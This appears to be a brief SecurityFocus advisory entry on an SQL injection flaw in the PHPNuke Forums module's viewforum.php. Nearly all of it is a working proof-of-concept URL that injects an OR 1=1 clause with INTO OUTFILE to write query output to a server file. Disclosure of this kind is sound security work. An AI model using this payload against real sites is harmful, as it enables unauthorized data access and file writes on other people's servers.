PHPNuke Forum Module Viewforum.PHP SQL Injection Vulnerability

The following proof of concept was supplied:

http://www.example.com/modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/*


 

Privacy Statement
Copyright 2010, SecurityFocus